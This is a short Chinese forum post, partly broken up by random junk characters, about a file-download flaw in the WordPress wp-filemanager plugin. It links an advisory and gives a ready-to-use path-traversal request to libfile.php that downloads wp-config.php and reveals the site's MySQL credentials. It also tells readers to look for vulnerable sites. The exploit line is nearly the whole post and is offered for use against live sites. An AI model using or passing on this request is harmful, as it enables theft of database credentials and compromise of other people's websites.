洞详解:http://packetstormsecurity.com/f ... -File-Download.html: Q2 t" U& O3 @9 N5 x1 a5 P; X( J
1 h! l9 h( R: }- K! m8 V. u% L
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。! O' z4 N! I0 f. g& z
|